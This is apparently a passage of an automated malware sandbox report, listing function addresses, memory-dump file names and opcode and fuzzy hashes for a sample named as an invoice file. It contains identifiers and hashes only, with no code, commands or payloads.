                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 487cab5bb0f755ca0cbce04c23088ba42950a2d41e72e3e6fda1b95dec9fcf6c
                                                                                                                                        • Instruction ID: 3c765fc7c0c09e305406b8f53f34ab68aa76a541b880dffc6a51205457471bbc
                                                                                                                                        • Opcode Fuzzy Hash: 487cab5bb0f755ca0cbce04c23088ba42950a2d41e72e3e6fda1b95dec9fcf6c
                                                                                                                                        • Instruction Fuzzy Hash: 0B21C3726047659BD722CF18C880B6BB7E8FF88760F014559FDD89B642D730E9008BA2
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FEE388 Relevance: .1, Instructions: 86COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                                        • Instruction ID: 14e44c0068b561d1fbdcd5bee865faf9bf2444cd04d63586102ce56e4f1eb23d
                                                                                                                                        • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                                        • Instruction Fuzzy Hash: DA318931600645EFE721DFA9D984F6AB7F9EF85354F2045A9E592CB280E730EE01DB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0106E609 Relevance: .1, Instructions: 86COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f580b8a7d8da23abacaed965b44fa0bc6a5e4091c5fe7b492190452c41878f94
                                                                                                                                        • Instruction ID: 4cabea450f8164d33f0df2d2ff07d1defdb5f2441dec87bbbb74092a9e41d3f4
                                                                                                                                        • Opcode Fuzzy Hash: f580b8a7d8da23abacaed965b44fa0bc6a5e4091c5fe7b492190452c41878f94
                                                                                                                                        • Instruction Fuzzy Hash: 54318B796002059FCB18CF1CC8849AEB7F9EF88344B15845AF88A9B391E771AE40CB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 010706F1 Relevance: .1, Instructions: 79COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 5f5bf931bad151b3a336fde2140414b9ca63d4dd60e8b2ea7b830c6b4b7ee176
                                                                                                                                        • Instruction ID: dcf29c5bd07aa29d4991e681a051e07a452ebaeea00f075416c1802c68d61951
                                                                                                                                        • Opcode Fuzzy Hash: 5f5bf931bad151b3a336fde2140414b9ca63d4dd60e8b2ea7b830c6b4b7ee176
                                                                                                                                        • Instruction Fuzzy Hash: FC219E71D001299BCB259F59C881ABEB7F8FF48740B44416AF581AB244D778AD41CBA4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0107019F Relevance: .1, Instructions: 78COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 08211b0760aa0924eff2173593c54dc4faf8799fda8d672720ee3da9d7a3db8c
                                                                                                                                        • Instruction ID: dd3a29541c4cdfd18addbfd5e128e9034dedfc7a3e91dd4b7b012729c7856ba6
                                                                                                                                        • Opcode Fuzzy Hash: 08211b0760aa0924eff2173593c54dc4faf8799fda8d672720ee3da9d7a3db8c
                                                                                                                                        • Instruction Fuzzy Hash: 0E21BF71A00645AFD716DB6CD840F6AB7E8FF59740F1401AAF984DB6A0D638ED00CB68
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01070283 Relevance: .1, Instructions: 74COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e8a933d3ea2e1d78c1b6ae5a0836c9d7e57539af07173a88cb3d50bd65270c1d
                                                                                                                                        • Instruction ID: 24baaa761cf8ecbcc1b487b00b600471550c61235fdd7d723679f6cac7b6e42a
                                                                                                                                        • Opcode Fuzzy Hash: e8a933d3ea2e1d78c1b6ae5a0836c9d7e57539af07173a88cb3d50bd65270c1d
                                                                                                                                        • Instruction Fuzzy Hash: BB21C4729042469FE712EF69C844F9BBBDCAF92240F084596B9C0C7255D734D505C7A5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01012835 Relevance: .1, Instructions: 73COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 5d86274f8629b31e6874e368f046ce8b22426bf2ed2a4a5dd29e525864ba42a4
                                                                                                                                        • Instruction ID: 26d4cef3008e6e5fcc8a153d286ffbbb2387766deaa4a0009efd188419dbb175
                                                                                                                                        • Opcode Fuzzy Hash: 5d86274f8629b31e6874e368f046ce8b22426bf2ed2a4a5dd29e525864ba42a4
                                                                                                                                        • Instruction Fuzzy Hash: 2B21C531705681DBF363776C8C04B6A7BD4AF41764F3903A0FEA19F6E6DB6C88018210
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FF6C50 Relevance: .1, Instructions: 73COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e8ccae6e2f7e35f84e7bb989f2678c939a5afa5094da6a1dc038476e0161c08b
                                                                                                                                        • Instruction ID: 889e79c7885c86910643bc0e26f784a6ff4b72c1e7b51bb58274ebca879d813d
                                                                                                                                        • Opcode Fuzzy Hash: e8ccae6e2f7e35f84e7bb989f2678c939a5afa5094da6a1dc038476e0161c08b
                                                                                                                                        • Instruction Fuzzy Hash: 30315675601604CFC761CF18C080B26BBE8FF48714F2484A9EA898B762DB31E942CB90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0102A30B Relevance: .1, Instructions: 70COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e51e97a35cf451cbb0b1a289040e0066ce2836d24aa861154c450264da744da4
                                                                                                                                        • Instruction ID: 79995ad88828e9029cdf85020731a89837457f15cc06f0770595e02f8e1c90e0
                                                                                                                                        • Opcode Fuzzy Hash: e51e97a35cf451cbb0b1a289040e0066ce2836d24aa861154c450264da744da4
                                                                                                                                        • Instruction Fuzzy Hash: 6621A935200A11DFC726DF29CD01B46B7F5BF48B08F2484A8E589CBB61E732E842CB94
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01070946 Relevance: .1, Instructions: 70COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 42d8a8a317e74d45fbd0fc998aeef1b25d9e8547ba93a50c1a6c4e7bb3356d81
                                                                                                                                        • Instruction ID: b7bbd6a08444090d24f93484d17927420818ddd3828381622cc2887557d2e9c1
                                                                                                                                        • Opcode Fuzzy Hash: 42d8a8a317e74d45fbd0fc998aeef1b25d9e8547ba93a50c1a6c4e7bb3356d81
                                                                                                                                        • Instruction Fuzzy Hash: F52119B1E00209ABCB20CFAAD8819AEFBF8FF98700F10412FE445EB254DA749941CB54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 010880A8 Relevance: .1, Instructions: 69COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                                        • Instruction ID: 1dc07f6129ddd211d2c4ebdc019968a135b251e0aa6903dc3007d249301cba58
                                                                                                                                        • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                                        • Instruction Fuzzy Hash: 56218172904209EFDF129F98CC40F9EBBBAEF88310F204456F980A7251D734DD518B50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01020124 Relevance: .1, Instructions: 68COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                                        • Instruction ID: 4469311acc4489d4e9aecfdbcd42fdc2b6d237e196ef98e08ff47f54f136d6f1
                                                                                                                                        • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                                        • Instruction Fuzzy Hash: 1811EF73640715AFE7229B48CC81F9ABBB8EB80754F20402AFA808B190D671ED44CB60
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FF8770 Relevance: .1, Instructions: 68COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 5c3b2e5577ef63b88554002c5a7c1448bcd98d23cb96f0328310201a8b9daef0
                                                                                                                                        • Instruction ID: 1d98ab5e9b4f1e58adc3088f64d3e7f8c1e6a28977505e0129672e7ff862beda
                                                                                                                                        • Opcode Fuzzy Hash: 5c3b2e5577ef63b88554002c5a7c1448bcd98d23cb96f0328310201a8b9daef0
                                                                                                                                        • Instruction Fuzzy Hash: DC11C836B006199BCB11DF49C5C0B36B7E5AF467A0B24406DEE089F325DAB2DD02D790
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0102AAEE Relevance: .1, Instructions: 68COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                                                        • Instruction ID: 6dab75e53755baa210c73f851dd8ff378fb712d8248984f8b444fa8b19cc5bab
                                                                                                                                        • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                                                        • Instruction Fuzzy Hash: 5E218E72B40655DFD7368F49C540A66FBE6EB94B10F1488BDE5858BA12CB30EC01CF40
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FF80E9 Relevance: .1, Instructions: 66COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 7cb6698b612dc11ec28501b0326d225b46adee0166f9a8f147e7a89d957ea2c2
                                                                                                                                        • Instruction ID: b47d8bcf3b7f35eb251b14b66b2d5b289ea83ae78c2b755390fc2e33da03e983
                                                                                                                                        • Opcode Fuzzy Hash: 7cb6698b612dc11ec28501b0326d225b46adee0166f9a8f147e7a89d957ea2c2
                                                                                                                                        • Instruction Fuzzy Hash: B6214C76A00209DFCB14CF58C581AAABBB5FF89758F24426DD205AB360CB71AD06DB90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0102674D Relevance: .1, Instructions: 65COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 0d869ebb53b39d1c08856fb8ff8db7cb9950a0cdfbbca558f17aaf8c8b719510
                                                                                                                                        • Instruction ID: e8cf94c504aef688f18c9ded52b6211eabb0534d045b622e3b4760a0b77e53b2
                                                                                                                                        • Opcode Fuzzy Hash: 0d869ebb53b39d1c08856fb8ff8db7cb9950a0cdfbbca558f17aaf8c8b719510
                                                                                                                                        • Instruction Fuzzy Hash: E9219071500A11EFD7658F69D840F6AB7F8FF44350F04882DE9DAC7250DA71AC40CB60
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01086870 Relevance: .1, Instructions: 63COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 77d4bbb4514f12f0552bc0ab5307addf42289a28a7fde8766c500375c67eaffc
                                                                                                                                        • Instruction ID: 4e69df35ced4fb29421910b0deb50dda987b3c4af004b6083b332a201d2879e6
                                                                                                                                        • Opcode Fuzzy Hash: 77d4bbb4514f12f0552bc0ab5307addf42289a28a7fde8766c500375c67eaffc
                                                                                                                                        • Instruction Fuzzy Hash: 6711C132244904EFD722EB59CD40F9A77ACEF99B60F024065F2C5DB290DA72E901C791
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0101E8C0 Relevance: .1, Instructions: 63COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 5689469b4390978b4ba8a8291bc0a29a7a6b013c3ebda4ae112664d7b7193b93
                                                                                                                                        • Instruction ID: a776c3d8755c0cd8b267b62e9628eb58484e4c584d42ac0adce1ca37fdedfe05
                                                                                                                                        • Opcode Fuzzy Hash: 5689469b4390978b4ba8a8291bc0a29a7a6b013c3ebda4ae112664d7b7193b93
                                                                                                                                        • Instruction Fuzzy Hash: AB1144323001159FCB1ADB29CC84A6F72ABEFD2370F254538EDA2CB280E9358842C391
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 010266B0 Relevance: .1, Instructions: 61COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 316840361f3a5121d7c92679304e8613df19e9eb89752b7974f9d6a08183b054
                                                                                                                                        • Instruction ID: 4a69f9d77b75bbb11b426dee2a5aa67f0daaaaf9badab4a4579f68e24f32890b
                                                                                                                                        • Opcode Fuzzy Hash: 316840361f3a5121d7c92679304e8613df19e9eb89752b7974f9d6a08183b054
                                                                                                                                        • Instruction Fuzzy Hash: 4B11CE76A01225DFCB26CF59E580A5ABBF8BF94610F0140BADD899B350E636DD00CB90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 010BA8E4 Relevance: .1, Instructions: 61COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                                        • Instruction ID: 624e49cf347f70239b5b2a9666d05304c1d1ccfa608a81ab8e06bdfe8967f476
                                                                                                                                        • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                                        • Instruction Fuzzy Hash: 2C11E236A00909EFDB19CB58C841ADEBBF5EF84210F058269E89597340E631AD01CB80
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FF0AD0 Relevance: .1, Instructions: 61COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                                        • Instruction ID: 15dadb0a1bfcd60a2136b952119eedb407139582b1ea5fcbf4ce0776cd4f512b
                                                                                                                                        • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                                        • Instruction Fuzzy Hash: 8521F4B5A00B499FD3A0CF29C540B52BBF4FB48B20F10492AE98AC7B50E771E814CB90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0107E7E1 Relevance: .1, Instructions: 59COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                        • Instruction ID: 796ebb1b2367ec55d076a3361c1a66fd1fcdc6a48cbc73c781ad8200e054f909
                                                                                                                                        • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                        • Instruction Fuzzy Hash: 7311A332E02604EFE7A19F48CC40B5A7BE5EF45750F0584A8EA8D9B261D771DC40DB94
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 010127ED Relevance: .1, Instructions: 58COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6997deb948025e15d0444983603856dd7f32147260cd1f04aba64f8eeea2632d
                                                                                                                                        • Instruction ID: 25e71d760f0e8c688a88c6503d3de7ae8e1fc1edad9eabc53044a985c844ea99
                                                                                                                                        • Opcode Fuzzy Hash: 6997deb948025e15d0444983603856dd7f32147260cd1f04aba64f8eeea2632d
                                                                                                                                        • Instruction Fuzzy Hash: 1A010431706649EFE317B26E9848F6B7BCCEF40394F1500A5FD818B291EA18DC00C271
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FF4690 Relevance: .1, Instructions: 57COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d9ed97b5b81f268c3ed55ff9833ef1448ea09b23a1b09ad5bb20976101a5c979
                                                                                                                                        • Instruction ID: 4fa736f5d3e9a56578f8fea93d97c8b915683e4b1f381bb171dc6f2063c181b3
                                                                                                                                        • Opcode Fuzzy Hash: d9ed97b5b81f268c3ed55ff9833ef1448ea09b23a1b09ad5bb20976101a5c979
                                                                                                                                        • Instruction Fuzzy Hash: 0711CA36644649AFDB259F59D940F6777A8EF9AB64F004119FA048B2A0C370FC50EFA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 01026620 Relevance: .1, Instructions: 56COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 6be10c2f9e145336c5e98bc67b02048fec3a445779bb30affab21d711c24c36c
                                                                                                                                        • Instruction ID: 61f35b5e71bbb88ca81ca51a3907a1a0dcbada7d456652da586aa921ec0e1bfb
                                                                                                                                        • Opcode Fuzzy Hash: 6be10c2f9e145336c5e98bc67b02048fec3a445779bb30affab21d711c24c36c
                                                                                                                                        • Instruction Fuzzy Hash: 1511A372900629ABDB32DF99C984B5EFBF8FF48750F500454DE41A7200D735AD018B50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0101EA2E Relevance: .1, Instructions: 56COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 438fb089d51172982da549d4af389d099c145c4111d04faecb2073ce2e31311d
                                                                                                                                        • Instruction ID: a8b45b655499e651c99497007d28b5fb6233d3ede516a6ec0e3cb2ddb2d6170a
